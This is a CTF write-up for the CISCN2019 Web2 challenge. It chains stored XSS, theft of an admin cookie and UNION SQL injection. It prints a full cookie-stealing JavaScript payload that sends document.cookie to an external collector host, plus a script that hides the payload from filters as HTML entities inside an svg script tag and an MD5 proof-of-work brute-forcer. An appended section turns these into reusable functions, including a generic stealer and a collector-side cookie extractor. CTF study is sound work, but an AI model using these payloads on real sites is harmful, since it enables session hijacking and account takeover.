[CISCN2019 華東北賽區]Web2 practice notes
阿新 • Published: 2022-02-05
Most of my study time recently has gone into new things; I only browse freebuf now and then, or do the occasional CTF challenge, to keep my earlier direction warm.
After registering and logging in, the challenge lets you post submissions and send feedback, and an XSS platform is provided.
There is an admin.php page that requires authentication to access.
Plan: post a submission carrying XSS code, use the feedback form to get the administrator to visit it, catch the administrator's cookie, and use it to get into admin.php.
Source of the XSS platform's default payload (it exfiltrates the page URL, top URL, cookie and opener URL by loading an image from the collector, then keeps the session alive with a second request):
(function(){
    (new Image()).src = 'http://xss.buuoj.cn/index.php?do=api&id=hPpiFj'
        + '&location=' + escape((function(){try{return document.location.href}catch(e){return ''}})())
        + '&toplocation=' + escape((function(){try{return top.location.href}catch(e){return ''}})())
        + '&cookie=' + escape((function(){try{return document.cookie}catch(e){return ''}})())
        + '&opener=' + escape((function(){try{return (window.opener && window.opener.location.href) ? window.opener.location.href : ''}catch(e){return ''}})());
})();
if ('1' == 1) {
    keep = new Image();
    keep.src = 'http://xss.buuoj.cn/index.php?do=keepsession&id=hPpiFj&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};
Change (new Image()).src to window.location.href, so that instead of creating an image the victim's browser is redirected straight to the collector.
Submitting the platform's payload as-is gets filtered. Bypass the filter with HTML character-reference encoding: put the script inside an svg tag (inside svg the HTML parser decodes character references in a script element before it runs) and have eval execute the decoded code.
Script that HTML-encodes the JavaScript and prints the payload:
# The redirect version of the platform payload (window.location.href instead of new Image()).
words = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=hPpiFj&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();"
encoded = ""
for c in words:
    # Decimal character reference for every character; the trailing ';' is
    # omitted here, which HTML parsers tolerate for numeric references.
    encoded += "&#" + str(ord(c))
# The decoded script is eval(function(){...})(): no literal JS survives in the submission.
print("<svg><script>eval" + encoded + "</script>")
After posting the submission, take the URL of the resulting page and submit it through the feedback page.
The feedback form has a verification code: you must supply a number whose MD5 hex digest begins with a given six-character value. A short brute-force script finds one:
import hashlib

# Brute-force the proof-of-work: find an integer whose MD5 starts with the
# prefix the form showed (6a1b6f in this instance).
for i in range(1, 10000000000):
    md = hashlib.md5(str(i).encode("utf-8")).hexdigest()
    if md[0:6] == '6a1b6f':
        print(i)
        break
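As an added example (not part of the original write-up), the two preparation steps above generalised into reusable functions: an entity encoder and svg wrapper for any JavaScript with a decode self-check, a proof-of-work solver for any MD5 prefix rather than the hard-coded 6a1b6f, and the collector side that pulls the cookie back out of the request the administrator's browser makes. The collector URL and the cookie value are constructed for the example; the real collector in this challenge was xss.buuoj.cn with id hPpiFj.

```python
import hashlib
import html
import itertools
from urllib.parse import urlsplit, unquote

# Constructed collector URL for this example (the write-up uses
# http://xss.buuoj.cn/index.php?do=api&id=hPpiFj).
COLLECTOR = "http://collector.example.test/index.php?do=api&id=EXAMPLE"


def cookie_stealer_js(collector: str) -> str:
    """Redirect-style stealer: the victim's browser navigates to the collector
    with its document.cookie in the query string (the window.location.href
    variant of the platform payload, without the extra location/opener fields)."""
    return ("(function(){window.location.href='" + collector +
            "&cookie='+escape(document.cookie);})();")


def entity_encode(js: str, semicolon: bool = True) -> str:
    """Encode every character as a decimal character reference (&#NN;).
    semicolon=False reproduces the write-up's &#NN form, which HTML parsers
    also accept for numeric references."""
    suffix = ";" if semicolon else ""
    return "".join("&#%d%s" % (ord(c), suffix) for c in js)


def svg_payload(js: str) -> str:
    """Wrap the encoded JS as <svg><script>eval...</script>. Inside <svg> the
    HTML parser treats <script> as foreign content and decodes the character
    references before the script runs, so a filter looking for literal
    JavaScript in the submission never sees any."""
    return "<svg><script>eval" + entity_encode(js) + "</script>"


def decoded_script(payload: str) -> str:
    """What the browser actually executes: strip the wrapper and decode the
    entities. Used as a self-check that the payload round-trips."""
    inner = payload[len("<svg><script>"):-len("</script>")]
    return html.unescape(inner)


def solve_md5_prefix(prefix: str, limit: int = 50_000_000) -> int:
    """Find the first positive integer whose MD5 hex digest starts with prefix
    (the feedback form's proof-of-work). A 6-hex-char prefix needs about
    16.7 million tries on average; shorter prefixes are near-instant."""
    for i in itertools.count(1):
        if i > limit:
            raise ValueError("no preimage found below limit")
        if hashlib.md5(str(i).encode()).hexdigest().startswith(prefix):
            return i


def extract_cookie(request_url: str) -> str:
    """Collector side: pull the stolen cookie out of the request URL the
    victim's browser hit. JS escape() percent-encodes but leaves '+' literal,
    so decode with unquote rather than unquote_plus."""
    for part in urlsplit(request_url).query.split("&"):
        key, _, value = part.partition("=")
        if key == "cookie":
            return unquote(value)
    return ""


if __name__ == "__main__":
    js = cookie_stealer_js(COLLECTOR)
    payload = svg_payload(js)
    assert decoded_script(payload) == "eval" + js
    print(payload[:80] + "...")
    n = solve_md5_prefix("abc")
    print(n, hashlib.md5(str(n).encode()).hexdigest())
    # Constructed example of a request the collector would log:
    hit = COLLECTOR + "&cookie=PHPSESSID%3Dadminsession123"
    print(extract_cookie(hit))
```

The decode check matters in practice: if the target re-encodes or strips `&` or `#` on the way into the page, the entities never reach the parser intact, and comparing `decoded_script` of what the page actually renders against the intended script is the quickest way to see where the payload was mangled.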
Once the feedback is accepted, the administrator's browser visits the submission and the platform records the administrator's cookie; set that cookie in our own browser and admin.php opens.
From there the simplest UNION-based SQL injection yields the flag.